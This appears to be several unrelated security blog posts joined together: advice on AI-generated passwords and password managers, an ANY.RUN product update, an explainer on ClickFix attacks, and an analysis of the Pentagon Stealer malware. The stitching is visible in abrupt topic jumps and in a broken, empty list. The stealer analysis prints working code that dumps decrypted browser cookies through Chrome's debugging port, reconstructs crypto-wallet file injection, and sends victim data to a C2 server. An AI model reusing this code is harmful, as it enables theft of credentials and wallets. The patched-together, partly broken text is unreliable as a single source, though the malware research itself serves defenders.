Needless to say, these are not secure passwords, as intelligent brute-forcing algorithms are well aware of the letter substitution trick. ChatGPT does a better job. Here are some examples of what it came up with:
qLUx@^9Wp#YZ
LU#@^9WpYqxZ
YLU@x#Wp9q^Z
P@zq^XWLY#v9
v#@LqYXW^9pz
These seem to be completely random sets of letters, special characters, and numbers. However, if you look closely, you can easily find some patterns. Some characters, for example, 9, W, p, x, and L, are used more often than others. We compiled a character frequency histogram for all generated passwords, and here’s what we found: ChatGPT’s favorite letters are x and p, Llama loves the character # and is partial to p too, while DeepSeek is hooked on t and w. Meanwhile, a perfectly random number generator would never favor any particular letter over others, but use every character roughly an equal number of times, making the passwords less predictable.
Frequency of character usage by different language models when generating a thousand passwords. Note that almost every password generated by ChatGPT contains the letters x, p, I, and L.
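The frequency analysis behind that histogram is easy to reproduce: count how often each character appears across the generated passwords and see whether some characters dominate. A minimal sketch, using the five ChatGPT examples above as a stand-in for a much larger sample:

```python
from collections import Counter

# Stand-in for a large set of AI-generated passwords.
passwords = ["qLUx@^9Wp#YZ", "LU#@^9WpYqxZ", "YLU@x#Wp9q^Z", "P@zq^XWLY#v9", "v#@LqYXW^9pz"]

counts = Counter("".join(passwords))
total = sum(counts.values())

for char, count in counts.most_common(10):
    print(f"{char!r}: {count} ({count / total:.1%})")
# A truly random generator would produce a roughly flat distribution with no clear favorites.
```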
In addition, LLMs, like humans, often neglect to insert special characters or numbers into passwords. A lack of these symbols was found in 26% of passwords generated by ChatGPT, 32% of those generated by Llama, and 29% by DeepSeek.
Awareness of these specifics can help cybercriminals brute-force AI-generated passwords significantly faster. We ran the entire set of AI-generated passwords through the same algorithm we used for the previous study, only to find a discouraging trend: 88% of passwords generated by DeepSeek, and 87% by Llama, proved insufficiently secure. ChatGPT came out on top — with only 33% of its passwords insecure.
Sadly, LLMs don’t create a truly random distribution, and their output is predictable. Besides, they can easily generate the same password for you as for other users. So what should we do?
Combined approach
We recommend using our Password Checker service or, better yet, Kaspersky Password Manager, to generate passwords. These two use cryptographically secure generators to make passwords that don’t contain detectable patterns, which guarantees true randomness. After generating a strong password, you can then come up with a mnemonic phrase to remember it.
Let’s say the password generator gives you the following combination: HSVpk*VR0Gkq#R
Then, a phrase to help you remember the password might look like this: In a high-speed vehicle (HSV), you go over a peak (pk) and see a star (*) in virtual reality (VR). Then you fall at zero gravity (0G) and see the king and queen (kq) behind the bars (#) in a big tower shaped like a chess rook (R).
Only mnemonics can help with this, so we hope you like abstract and absurd imagery. You can also try drawing the scene that describes your password as shown above. Few would be able to understand the picture besides you. That’s an easy way to memorize one password. But what if there are hundreds of them?
How about storing passwords in a browser?
Not a good idea. To address the issue of remembering passwords, browser developers provide options to generate and save passwords right in the browsers. This is naturally very convenient: the browser itself fills in the password for you whenever needed. Unfortunately, a browser is not a password manager, and storing passwords there is extremely insecure.
The problem is, cybercriminals figured out a long time ago how to use simple scripts to pull passwords stored in browsers in mere seconds. And the way browsers sync data across different devices in the cloud — such as through a Google account — is a disservice to users. All it takes is to hack or trick someone into giving up the password for that account, and all their other passwords are an open book.
Use a password manager
A real password manager stores all passwords in an encrypted vault. For example, Kaspersky Password Manager stores all your passwords in a vault encrypted with the AES-256 symmetric encryption algorithm, used by the U.S. National Security Agency to store state secrets. The algorithm uses a master password, which only you know (even we don’t know it) as the encryption key. Each time Kaspersky Password Manager is accessed, the app requests this password from you and decrypts the vault for the current session. In this same encrypted vault you can also store other important information such as bank card numbers, document scans, or notes.
It can be used to generate unique and truly random password combinations.
It can fill in your passwords for you both on computers and mobile devices.
The app is provided for both major mobile platforms as well as macOS and Windows computers; there are also extensions for popular browsers.
The password database is synchronized across all your devices in encrypted form.
You can use it instead of Google Authenticator to generate 2FA codes for all your online accounts.
It checks if your passwords have been leaked or compromised and alerts you if you need to change any of them.
With Kaspersky Password Manager, all you need do is use the methods described above to come up with and remember one master password, which is used to encrypt the password manager vault. Just remember: you’ll have to memorize this password extremely well, because if you lose it you’re back to square one. No one — not even Kaspersky employees — can access your encrypted vault. We don’t know your master password either.
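To make the general principle tangible (a key derived from the master password is what unlocks the vault), here is a toy sketch using PBKDF2 and Fernet from Python’s cryptography package. It is not Kaspersky Password Manager’s actual implementation, and Fernet uses AES-128 internally rather than the AES-256 scheme described above; the point is only that without the master password, the stored data is unreadable.

```python
import base64
import os
from cryptography.fernet import Fernet
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC

master_password = b"correct horse battery staple"  # known only to the user
salt = os.urandom(16)                              # stored alongside the vault

# Derive a symmetric key from the master password.
kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=salt, iterations=600_000)
key = base64.urlsafe_b64encode(kdf.derive(master_password))

vault = Fernet(key)
token = vault.encrypt(b"example.com: hunter2-but-much-stronger")
print(vault.decrypt(token))  # only someone who knows the master password can decrypt this
```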
Let’s recap
So how do you properly handle passwords in 2025?
Follow the guidelines above to come up with a secure master password, and use our Password Checker service to test its cryptographic strength.
Can’t think of a strong master password? Create one right there, and use mnemonic rules to memorize it.
Install Kaspersky Password Manager on all your devices. With this app, you only need to remember the master password. The app will remember the rest for you.
Use passkeys and various two-factor authentication methods wherever possible — preferably through the app. Combining a strong password with secure authentication methods creates a powerful synergy, which significantly enhances protection against unauthorized access to your accounts.
April was another busy month for the ANY.RUN team! We continued improving our malware detection capabilities, expanded our behavior signatures, and sharpened threat intelligence, all to make your investigations faster, deeper, and even more precise.
From adding fresh Suricata rules and YARA signatures to detecting new malware behaviors, here’s what’s new at ANY.RUN this month.
Let’s dive in!
Product Updates
Integration of ANY.RUN Services with Your Security Systems via SDK
In April, we announced the release of the ANY.RUN SDK, making it easier than ever to integrate our products directly into your infrastructure.
Security teams can now automate submissions, accelerate workflows, and tailor ANY.RUN’s solutions to fit their existing systems like SIEM, SOAR, or XDR. This gives them faster investigations, fewer manual tasks, and more resources freed up for critical analysis.
By integrating ANY.RUN’s products into the security infrastructure via SDK, you can:
Search IOCs, IOBs, and IOAs across our threat database via TI Lookup
Receive and process network-based IOCs with TI Feeds
The SDK is available for users with the Hunter and Enterprise plans.
With the help of this simple integration, we want to make sure that organizations reduce incident response time, improve detection rates, and build a stronger, more resilient security posture.
How to get started: The SDK is Python-based and includes documentation, libraries, and ready-to-use code samples. Find full instructions on GitHub and PyPI.
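Purely as an illustration of what such an integration might look like in a playbook, here is a short sketch. The class and method names below are hypothetical placeholders rather than the SDK’s real API; refer to the documentation on GitHub and PyPI for the actual interface.

```python
# Hypothetical sketch only: names below are placeholders, not the real ANY.RUN SDK API.
from anyrun_sdk import SandboxClient  # hypothetical import

client = SandboxClient(api_key="YOUR_API_KEY")

# Submit a suspicious attachment from a SOAR playbook and wait for the verdict.
task = client.submit_file("suspicious_invoice.xlsm", environment="windows10")
report = task.wait_for_report(timeout=300)

print(report.verdict)        # e.g. "malicious"
print(report.iocs.domains)   # network IOCs to feed into blocklists or a SIEM
```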
Contributions and suggestions from other developers are also welcome! For more info on how to contribute, see our guide.
Test ANY.RUN’s services with a 14-day trial to see how they can strengthen your company’s security
New Notifications section displayed inside ANY.RUN
ANY.RUN users will now have access to Notifications directly from the platform interface.
This section is built to keep you informed about the most important updates without cluttering your workflow.
With quick access to key information, your security team can easily stay on top of new capabilities, detection improvements, and emerging threats.
Notifications are short, clear, and actionable, so you can stay focused on your investigations while staying in the loop.
Inside the Notifications section, you’ll find:
Key product updates and new feature announcements
Alerts about critical service improvements
Links to major research reports and threat analyses
Important security advisories from our team
Threat Coverage Updates
In April, we expanded our detection coverage across Android, Windows, and Linux environments with updated rules, behavior signatures, and threat intelligence to support more precise, faster investigations.
Here’s a quick look at what’s been updated:
New Suricata Rules
We added 902 new Suricata rules in April to improve visibility into network-based threats, including malicious domains, phishing infrastructure, and C2 traffic.
These updates enhance detection coverage for various malware families, including miners, stealers, and ransomware.
Behavior Signatures
We introduced 91 new behavior-based signatures to improve detection for malware samples across platforms. These updates include:
These exploits were identified during real-world malware analysis sessions and are now reflected in our detection logic. ANY.RUN continues to monitor and analyze new CVEs to provide fast, actionable insights for defenders.
New YARA Rule Updates
We released 13 new and updated YARA rules to improve static detection and classification, covering both new malware strains and updates to existing detections.
TI Reports get you up to speed on the latest cyber threats targeting businesses
In April, we added two new reports to our Threat Intelligence library, focused on advanced persistent threats (APTs) and coordinated cybercriminal activity. These reports provide fresh insights into recent campaigns, along with actionable tools to support threat hunting, attribution, and detection.
This report analyzes campaigns linked to APT37, EncryptHub, and STORM-1865, combining info from public research and ANY.RUN’s own findings. It includes:
IOC lists and observed TTPs
Related malware samples
TI Lookup queries and YARA rules
Guidance for detecting similar threats in your environment
This overview shows how threat actor activity is identified, analyzed, and traced using ANY.RUN’s tools.
Learn to Track Emerging Cyber Threats
Check out our expert guide to collecting intelligence on emerging threats with TI Lookup
Threat Actors Activity Overview 02
This report focuses on recent campaigns associated with PATCHWORK and APT29. It provides:
YARA rules and TI Lookup queries to support detection
IOC collections and sample analysis
Adversary profiles and campaign behavior
Technical breakdowns of malicious files
The report is built to support threat hunters and analysts in tracking high-impact adversaries with greater precision.
About ANY.RUN
ANY.RUN supports over 15,000 organizations across industries such as banking, manufacturing, telecommunications, healthcare, retail, and technology, helping them build stronger and more resilient cybersecurity operations.
With our cloud-based Interactive Sandbox, security teams can safely analyze and understand threats targeting Windows, Linux, and Android environments in less than 40 seconds and without the need for complex on-premise systems. Combined with TI Lookup, YARA Search, and Feeds, we equip businesses to speed up investigations, reduce security risks, and improve their teams’ efficiency.
From the near-demise of MITRE’s CVE program to a report showing that AI outperforms elite red teamers in spearphishing, April 2025 was another whirlwind month in cybersecurity
Attackers are increasingly using the ClickFix technique to infect Windows computers by tricking users into running malicious scripts manually. The use of this tactic was first seen in the spring of 2024. Since then, attackers have come up with a number of scenarios for its use.
What is ClickFix?
The ClickFix technique is essentially an attempt to execute a malicious command on the victim’s computer relying solely on social engineering techniques. Under one pretext or another, attackers convince the user to copy a long command line (in the vast majority of cases — a PowerShell script), paste it into the system’s Run window, and press Enter, which should ultimately lead to compromising the system.
The attack normally begins with a pop-up window simulating a notification about a technical problem. To fix this problem, the user needs to perform a few simple steps, which boil down to copying some object and executing it through the Run application. However, in Windows 11, PowerShell can also be executed from the search bar for applications, settings, and documents, which opens when you click on the icon with the system’s logo, so sometimes the victim is asked to copy something there.
ClickFix attack – how to infect your own computer with malware in three easy steps. Source
This technique earned the name ClickFix because the notification usually contains a button whose label is somehow related to the verb “to fix” (Fix, How to fix, Fix it…), which the user needs to click to solve the alleged problem or to see instructions for solving it. However, this isn’t a mandatory element — the need to launch some code can also be justified by a requirement to check the computer’s security or, for example, to confirm that the user is not a robot. In this case, the Fix button can be omitted.
An example of instructions for confirming that you’re not a robot. Source
The scheme may differ slightly from case to case, but attackers typically give the victim the following instructions:
click the button to copy the code that solves the problem;
press the key combination [Win] + [R];
press the combination [Ctrl] + [V];
press [Enter].
So what actually happens? The first action (clicking the button to copy the code that solves the problem) copies a script invisible to the user to the clipboard. The second (pressing the key combination [Win] + [R]) opens the Run window, which in Windows is designed to quickly launch programs, open files and folders, and enter commands. In the third (pressing the combination [Ctrl] + [V]), the PowerShell script is pasted into the Run window from the clipboard. And finally, with the fourth action (pressing [Enter]), the code is launched with the current user’s privileges.
As a result of executing the script, malware is downloaded and installed onto the computer — with the specific malicious payload varying from campaign to campaign. In other words, the user runs a malicious script on their own system, thereby infecting their own computer.
Typical attacks using the ClickFix technique
Sometimes attackers create their own websites and lure users to them using various tricks. Or they hack existing websites and force them to display a pop-up window with instructions. In other cases, similar instructions are delivered under various pretexts via email, social networks, or even instant messengers. Here are some typical scenarios of using this technique in attacks:
1. Unable to display the page, need to refresh the browser
A classic scenario in which the visitor doesn’t see the page they expected to and is told they need to install a browser update to display it.
2. Error loading a document on a website
Another standard tactic: the user isn't allowed to view a certain document in Microsoft Word or PDF format. Instead, they're shown a notification asking them to install a plugin for viewing PDFs or "Word online".
3. Error opening a document from email
In this case, attackers disguise the file format. The victim sees a .pdf or .docx icon, but in reality clicks an HTML file that opens in the browser. Then everything proceeds as in the previous case: a missing "plugin", malicious instructions, and the familiar "How to fix" button.
4. Problems with the microphone and camera in Google Meet or Zoom
A more unusual variation of the ClickFix tactic is used on fake Google Meet or Zoom websites. The user receives a link for a video call, but “is not allowed to join” it, because there are problems with their microphone and camera. The message “explains” how to fix it.
5. Prove that you’re not a robot – fake CAPTCHA
Finally, the most curious version of the attack using ClickFix: the site visitor is asked to complete a fake CAPTCHA to prove they're not a robot. But the required proof, of course, is to follow the instructions written in the pop-up window.
Prove you're not a robot – to do this, run a malicious script on your computer.
How to protect yourself from ClickFix attacks?
The simplest mechanism for protecting your company from attacks using the ClickFix technique involves blocking the [Win] + [R] key combination in the system — it’s hardly needed at all in the day-to-day work of the typical employee. However, this isn’t a panacea — as we already wrote above, in Windows 11 the script can be launched from the search bar, and some variations of this attack use more detailed instructions in which the user is told how to manually open the Run window.
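For reference, the setting behind that recommendation is the NoRun Explorer policy value. The snippet below is only a minimal sketch of the underlying registry change for the current user; in practice you would normally roll this out via Group Policy rather than a script.

```python
# Sketch: disable the Win+R Run dialog for the current user via the NoRun Explorer policy.
# Normally deployed through Group Policy across the organization; shown here only to
# illustrate which setting is involved.
import winreg

def disable_run_dialog():
    path = r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
    with winreg.CreateKey(winreg.HKEY_CURRENT_USER, path) as key:
        winreg.SetValueEx(key, "NoRun", 0, winreg.REG_DWORD, 1)

if __name__ == "__main__":
    disable_run_dialog()
    print("Run dialog disabled for the current user (takes effect after sign-out or Explorer restart).")
```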
Therefore, protective measures should be comprehensive and primarily aimed at training employees. It's worth conveying to them that any request to perform manual manipulations with the system is an extremely alarming sign.
Here are some tips on how to protect your organization’s employees from attacks using ClickFix tactics:
Raise employee awareness of cyberthreats, including new tactics, with specialized training. Organizing such training is easy – just use our Kaspersky Automated Security Awareness Platform.
This article provides a technical analysis of an emerging malware named Pentagon Stealer. The research was prepared by the analyst team at ANY.RUN.
Key Takeaways
Variants: Exists in Python (AES-encrypted, multi-stage) and Golang (unencrypted, part of attack chains) versions.
Data Theft: Steals browser credentials, cookies, crypto wallet data (Atomic/Exodus), Discord/Telegram tokens, and specific files.
Debug Mode Exploitation: Launches Chromium-based browsers in debug mode to extract unencrypted cookies, bypassing DPAPI encryption for easier data theft.
Crypto Wallet Injection: Replaces app.asar files in Atomic/Exodus wallets with patched versions to steal mnemonics/passwords, using a public proof-of-concept available on GitHub.
Evolution and Campaigns: Spread via typosquatting, later under the names 1312, Acab, Vilsa, and BLX stealer. BLX adds clipboard, screenshot, and Steam/Epic data theft.
C2 Communication: Uses HTTP requests with servers like pentagon[.]cy and stealer[.]cy; BLX uploads to gofile.io, sending links to C2.
Ongoing Threat: Simple but persistent, with new variants showing minor updates, continuing to pose risks.
How We Discovered Pentagon Stealer
In early March of this year, while browsing Public submissions, the ANY.RUN team came across an interesting malware sample written in Golang.
Image 3. Sandbox analyses with the Pentagon tag displayed in TI Lookup
Among the search results, we identified a sandbox analysis of a website hosted on the domain pentagon[.]cy that featured the admin panel of this malware. Thus, we named it Pentagon Stealer.
Image 4. The admin panel
Exploring the website further, we discovered that there was also a Python-based version of this malicious program, available at pentagon[.]cy/paste?userid=<n>. You can see the page in this sandbox session.
Image 5. The original page containing a dropper script for deploying the first stage of the malware
Considering the lack of public information on the malware and its potential to pose a serious threat to our clients, we decided to analyze it and collect essential intel for effective detection of Pentagon Stealer.
Here’s what we’ve found.
Let's start with the Python variant, which can still be found on the attackers' infrastructure to this day. We'll then compare its functionality to that of the previous versions.
Initial Stage: Script Dropper
As seen in the sandbox analysis, the attack begins with a script dropper. Its purpose is to launch python_setup.py, which is encrypted with Fernet (AES in CBC mode).
Image 6. Decrypted script in CyberChef
You can use this decryption recipe in CyberChef for the initial and all subsequent stages, as the algorithm remains unchanged; only the key changes.
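If you prefer to work outside CyberChef, the same decryption can be reproduced in a few lines of Python with the cryptography library. The key and token below are placeholders you would extract from the dropper yourself.

```python
# Sketch: decrypt a Fernet-encrypted stage (Fernet = AES-128-CBC plus an HMAC-SHA256 check).
# FERNET_KEY and ENCRYPTED_STAGE are placeholders taken from the dropper script.
from cryptography.fernet import Fernet

FERNET_KEY = b"<base64 key extracted from the dropper>"
ENCRYPTED_STAGE = b"<base64 Fernet token extracted from the dropper>"

def decrypt_stage(key: bytes, token: bytes) -> bytes:
    return Fernet(key).decrypt(token)

if __name__ == "__main__":
    plaintext = decrypt_stage(FERNET_KEY, ENCRYPTED_STAGE)
    print(plaintext.decode("utf-8", errors="replace"))
```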
Main Stealer Module
Once we decrypt the payload, we can see the code of the stealer’s main module.
First, it checks whether the directory “%LOCALAPPDATA%/HD Realtek Audio Player” exists on the victim’s computer. If not, it creates it and continues execution. This is a technique used by the malware to check if the machine has already been infected.
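The marker check itself is trivial. The snippet below is a hedged reconstruction of that logic, not decompiled code; only the directory name comes from the sample.

```python
# Hedged reconstruction of the infection-marker check: the directory name is from the
# analyzed sample, the surrounding logic is illustrative.
import os
import sys

MARKER_DIR = os.path.join(os.environ.get("LOCALAPPDATA", ""), "HD Realtek Audio Player")

def already_infected() -> bool:
    if os.path.isdir(MARKER_DIR):
        return True
    os.makedirs(MARKER_DIR, exist_ok=True)
    return False

if already_infected():
    sys.exit(0)  # a previous run left the marker behind; stop here
# ...otherwise continue with data collection...
```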
The malware then begins to steal a variety of data, including:
Login credentials, cookies, and extension data from Chromium-based browsers and cookie data from Mozilla Firefox
Image 7. Code for stealing Firefox cookies
Data from apps for managing cryptocurrency wallets
Discord tokens and Telegram authorization data
Files with specific names and extensions from user directories
There are also two actions performed by the malware that stand out from the rest and are worth a more detailed analysis:
To steal cookies, Pentagon launches Chromium-based browsers in debug mode.
The malware also replaces app.asar files used by Exodus and Atomic wallets.
Let’s take a closer look at them.
Injection into Atomic and Exodus Crypto Wallets
The stealer can inject into two popular cryptocurrency wallet management applications: Atomic and Exodus. Both use Electron, which stores JavaScript code in app.asar files.
The injection performed by Pentagon involves replacing these files with attacker-patched versions.
The image above shows the stealer overwriting the app.asar content of both applications with data from its command server. Additionally, a loguuid is written to the LICENSE files in both cases, which allows the attackers to identify the victim.
Image 8. Code for injecting into Atomic and Exodus
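In essence, the injection boils down to two file writes per wallet. The sketch below is an illustrative reconstruction of that pattern, not the sample's code; the paths, the patched archive bytes, and the loguuid are placeholders standing in for data the real stealer receives from its command server.

```python
# Illustrative reconstruction of the app.asar replacement pattern described above.
# All arguments are placeholders; the real sample fetches the patched archive and
# the loguuid from its C2.
import os

def inject_wallet(asar_path: str, license_path: str, patched_asar: bytes, loguuid: str) -> None:
    if not os.path.exists(asar_path):
        return  # wallet not installed on this host
    with open(asar_path, "wb") as f:    # replace the Electron archive with the patched build
        f.write(patched_asar)
    with open(license_path, "w") as f:  # victim identifier used by the patched code
        f.write(loguuid)

# Example call with placeholder values:
# inject_wallet(r"<...\atomic\resources\app.asar>", r"<...\atomic\LICENSE>", patched_bytes, "log-uuid")
```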
But why did they overwrite app.asar and what specific changes were made?
Since .asar files are archives containing .js files, we can unpack them with 7-Zip using a special plugin to analyze the code. As expected, the goal here is to obtain the user's mnemonic and password. The images below illustrate how this is done.
Image 9. Collection of the user data in Atomic Wallet
The images show how a packet, containing the user’s password, mnemonic, and wallet type, is formed. One of the headers includes the loguuid.
Image 10. Collection of the user data in Exodus Wallet
It’s worth noting that the attacker clearly used Inject_PoC in this part of the operation, as indicated by the code similarity.
For example, the Atomic Wallet section from the PoC repository looks like this:
Image 11. The attacker reused code for injecting into Atomic
The similarity is evident. The attacker just simplified the packet. In the case of Atomic, even the application version matches.
For Exodus, the code segment from the repository looks like this:
Image 12. Inject_PoC code for injecting into Exodus
Launching Browsers in Debug Mode
This is a common technique for obtaining cookies in unencrypted form.
In short, this method causes some Chromium-based browsers to provide cookies in plaintext. If the standard method of extracting cookies from files were used, they would need to be decrypted, which can be problematic.
These browsers use the DPAPI mechanism to protect sensitive data. If the malware is executed in the session of a user whose password was used in the encryption process, a call to the UnProtect() function may be enough to decrypt the data. Otherwise, decryption can be extremely difficult. In addition, the task may be complicated, for example, by the Application-Bound (App-Bound) Encryption method used in the latest versions of Chrome.
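For reference, a same-user DPAPI decryption is essentially a one-liner with pywin32, which is why running inside the victim's session matters so much. The sketch below only illustrates that point and is not the stealer's code; the blob is a placeholder.

```python
# Sketch: DPAPI decryption only works this easily inside the session of the user
# (or machine context) that protected the blob. `protected_blob` is a placeholder.
import win32crypt  # pywin32

protected_blob = b"<DPAPI-protected bytes, e.g. a key taken from a browser's Local State>"

# CryptUnprotectData returns a (description, plaintext) tuple.
description, plaintext = win32crypt.CryptUnprotectData(protected_blob, None, None, None, 0)
print(plaintext)
```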
Here's how debugging helps to get cookies in an easier way (a short sketch of these steps follows below):
The browser is launched with a specified debugging port (default 9222).
A GET request is made to http://localhost:9222/json, which returns a JSON response containing webSocketDebuggerUrl.
Commands can be sent to this URL using the WebSocket protocol.
Using the Network.getAllCookies command, the desired cookies are obtained, already decrypted by the browser.
Image 13. Code for launching browsers in debug mode
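The steps listed above fit into a short script. The sketch below reproduces the technique in a lab setting using the requests and websocket-client libraries; the browser path, the headless flag, and the startup delay are assumptions for a test profile, not values from the sample, and it assumes the browser is not already running with the same profile.

```python
# Lab sketch of the debug-port cookie technique described above.
# Requires: requests, websocket-client. Browser path and port are assumptions.
import json
import subprocess
import time

import requests
import websocket  # pip install websocket-client

CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"  # assumed default install path
PORT = 9222  # default debugging port mentioned above

# 1. Launch the browser with a remote debugging port.
subprocess.Popen([CHROME, f"--remote-debugging-port={PORT}", "--headless=new"])
time.sleep(3)  # give the DevTools endpoint time to come up

# 2. The /json endpoint lists debug targets, each exposing a webSocketDebuggerUrl.
targets = requests.get(f"http://localhost:{PORT}/json").json()
ws_url = targets[0]["webSocketDebuggerUrl"]

# 3. Send a Chrome DevTools Protocol command over the WebSocket.
ws = websocket.create_connection(ws_url)
ws.send(json.dumps({"id": 1, "method": "Network.getAllCookies"}))
reply = None
while reply is None:
    msg = json.loads(ws.recv())
    if msg.get("id") == 1:
        reply = msg  # skip any asynchronous CDP events
ws.close()

# 4. Cookies arrive already decrypted by the browser itself.
for cookie in reply["result"]["cookies"]:
    print(cookie["domain"], cookie["name"], cookie["value"][:8] + "...")
```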
This method explains the unusual browser-relaunching behavior that piqued our interest when we first came across Pentagon's sample.
Decryption and Transition to the Next Stage: runpython.py
The final part of the stealer module is the decryption and launch of the next stage, runpython.py.
Image 14. Code for initializing the next stage
Once we decrypt the payload, we can see the command used.
Image 15. Decrypted command for the next stage launch
Following the URL inside the command reveals the dropper script used for launching runpython.py.
Image 16. Runpython.py dropper script
Yet Another Stage: Functionality of runpython.py
Inside runpython.py, we can see the following bat-file:
Image 17. Bat-file loader of the next stage
It follows this algorithm (a detection-oriented sketch follows the list):
Checks if it has access to system files, indicating admin rights.
If not, creates a temporary VBS script to relaunch the current BAT script with admin rights.
Creates the directory C:\Windows\WinEmptyfold as an infection indicator.
Runs PowerShell to add a Windows Defender exclusion, preventing it from scanning the C:\ drive.
Downloads the next stage from a remote resource and executes it as RuntimeBroker.exe.
Deletes files and directories used by the stealer.
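For defenders, the two most durable artifacts of this stage are the marker directory and the Defender exclusion. The following sketch checks a Windows host for both; Get-MpPreference is the standard Defender cmdlet, and the rest is illustrative.

```python
# Sketch: check a host for the two artifacts this loader leaves behind, the
# C:\Windows\WinEmptyfold marker directory and a Defender exclusion covering drive C:.
import os
import subprocess

def marker_present() -> bool:
    return os.path.isdir(r"C:\Windows\WinEmptyfold")

def drive_c_excluded() -> bool:
    out = subprocess.run(
        ["powershell", "-Command", "(Get-MpPreference).ExclusionPath"],
        capture_output=True, text=True, check=False,
    ).stdout
    return any(line.strip().rstrip("\\").lower() == "c:" for line in out.splitlines())

if __name__ == "__main__":
    print("WinEmptyfold marker:", marker_present())
    print("Drive C: excluded from Defender:", drive_c_excluded())
```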
In all samples we have analyzed (example), Pentagon Stealer exclusively dropped PureCrypter, which then deployed a miner. However, alternative payloads are possible.
Attack Chain and Timeline of Python-based Pentagon Stealer
Pentagon Stealer’s chain of attack can be represented in the following way:
Let’s now take a look at Pentagon’s development timeline and see what methods the attackers used for delivering it to victims.
March 2024: Typosquatting Campaign
One of the earliest campaigns we came across in our research involved masking Pentagon as popular PyPI Python packages using a technique called “typosquatting”.
In this version, the malware couldn’t steal Web Data from Chromium browsers, unencrypted cookies via browser debugging, or Telegram data. Additionally, the protocol for interacting with the C2 server was more primitive: all information was written to files, which were then sent to funcaptcha[.]ru/delivery.
September 2024: 1312 Stealer
In another campaign, the stealer was available under the name 1312 Stealer. ANY.RUN’s Public submissions help us track changes in the admin panel.
1312’s new functionality included stealing Web Data from Chromium-based browsers and Telegram tdata. Communication with the C2 server changed: passwords were sent to 1312services[.]ru/pw, Web Data to 1312services[.]ru/webdata, and everything else to 1312services[.]ru/delivery.
Now it's time to dissect the latest version of the stealer, which is currently being actively distributed. It retains the functionality of the Python version, with some improvements described below.
Image 21. Detect It Easy identified the sample as being written in Go
Unlike its Python counterpart, this variant does not download subsequent stages independently. Instead, it is used as one of the modules in the attack chain, as shown by sandbox analysis. Learn more about this in the ‘Infection Methods’ section.
Upon launch, the stealer hides its console window and checks for the directory %LOCALAPPDATA%\Realtek HD Audio Service on the victim's computer, indicating previous execution.
It then begins collecting information as described above. The main improvement, unique to the Golang version, is the ability to steal data not only from Firefox but also from other Gecko-based browsers, including:
Zen
SeaMonkey
Waterfox
K-Meleon
Thunderbird
IceDragon
Cyberfox
BlackHawk
Pale Moon
Mercury
Librewolf
The malware can now steal passwords from these browsers, in addition to cookies. The rest of the functionality remains unchanged, though the programming language is different.
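For context, "stealing cookies from a Gecko-based browser" mostly means reading a plain SQLite file. A minimal example for a default Firefox profile is shown below; the path glob is an assumption, and other Gecko browsers keep analogous profile directories.

```python
# Minimal sketch: Gecko-based browsers keep cookies in a plain SQLite database
# (cookies.sqlite, table moz_cookies) inside each profile directory.
# The glob assumes a default Firefox install; close the browser or copy the file first,
# since a running browser may hold the database locked.
import glob
import os
import sqlite3

profile_glob = os.path.join(
    os.environ.get("APPDATA", ""), "Mozilla", "Firefox", "Profiles", "*", "cookies.sqlite"
)

for db_path in glob.glob(profile_glob):
    with sqlite3.connect(db_path) as conn:
        rows = conn.execute("SELECT host, name, value FROM moz_cookies LIMIT 5").fetchall()
    for host, name, value in rows:
        print(host, name, value[:8] + "...")
```

Saved passwords are a harder target: they live in logins.json and are encrypted with keys from key4.db, so extracting them requires NSS-based decryption rather than a simple file read.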
C2 Communication Protocol
Regarding interaction with the C2 server, recent malware versions use two domains: stealer[.]cy and pentagon[.]cy. The communication method is identical in both the latest Python and Golang versions.
Image 22. How Pentagon Stealer communicates with the C2
The stealer and command server communicate via HTTP requests. Upon log creation (create_log()), the victim sends the number of collected passwords, cookies, Discord tokens, and names of all collected files. The server responds with either a rejection or a log_uuid, which is subsequently used as the victim’s identifier, replacing the previously hardcoded uuid.
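A hedged approximation of the client side of this exchange is shown below; the endpoint name mirrors the create_log() function seen in the code, while the JSON field names are illustrative assumptions rather than the sample's exact schema.

```python
# Hedged approximation of the create_log exchange. The endpoint name mirrors the
# function seen in the code; the JSON field names are illustrative assumptions.
import requests

C2 = "https://pentagon[.]cy"  # defanged on purpose; not resolvable as written

def create_log(passwords: int, cookies: int, discord_tokens: int, files: list[str]) -> str | None:
    payload = {
        "passwords": passwords,
        "cookies": cookies,
        "discord_tokens": discord_tokens,
        "files": files,
    }
    resp = requests.post(f"{C2}/create_log", json=payload, timeout=10)
    data = resp.json()
    # The server either rejects the log or returns a log_uuid used as the victim's identifier.
    return data.get("log_uuid")
```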
Image 23. POST request to pentagon[.]cy/create_log shown in ANY.RUN
Image 24. C2 response
Infection Methods
Notably, the Golang version of the stealer lacks any encryption of its code and strings, which is unusual since each subsequent stage of its Python counterpart is encrypted using AES. This suggests the possible existence of a dropper or loader.
A search in TI Lookup involving the stealer yielded the following analysis.
Here is the sample’s execution chain:
Image 25. Attack chain involving the Golang version
The initial attack stage involved running an NSIS installer named BlumBot.exe. This installer executed a VBS script that displayed a familiar message, "vcruntime140.dll is missing from your computer". It then proceeded to launch the next stage, Installer.exe.
Notably, reverse-engineering BlumBot.exe was not necessary to uncover this. A tool capable of unpacking NSIS installers and extracting the .nsi script was enough. In our investigation, we used NanaZip.
NSIS installer in NanaZip:
Image 26. NSIS installer in NanaZip
Fragment of the .nsi script:
Image 27. Piece of .nsi script
Installer.exe is a loader written in Golang. Its sole purpose is to download and execute two files, ByPass.exe and Main.exe, from biteblob[.]com, and then send a Telegram message confirming successful execution.
Following this, the stealer and a second module, which is actually a miner, are executed.
This is just one example of how Pentagon Stealer is used. In Public Submissions, you can frequently observe samples of various malware using this stealer as one stage in an attack chain.
Further Evolution of Pentagon Stealer
As mentioned, this malware has appeared under various names, although its core functionality remains unchanged, with only minor logical modifications. This trend continues today.
For instance, we recently discovered samples of a stealer with identical code but named BLX Stealer, as indicated by code strings and the description in this article.
The attack consists of multiple stages, but we focus on the stealer itself.
This version is written in Python, like its predecessors, but is packaged into an executable using PyInstaller. With pyinstxtractor and pylingual.io, we successfully reconstructed the stealer’s source code for analysis.
Regarding functionality, this version does not appear to branch off from the latest Pentagon Stealer, as it lacks crypto-wallet injection and data theft from Gecko-based browsers other than Mozilla Firefox.
Yet, it has unique features not previously observed:
Extracts clipboard content
Captures screenshots
Reads system information
Retrieves additional Discord user information, including two-factor authentication status, Nitro subscription type, and user badges
Steals Steam and Epic Games account data
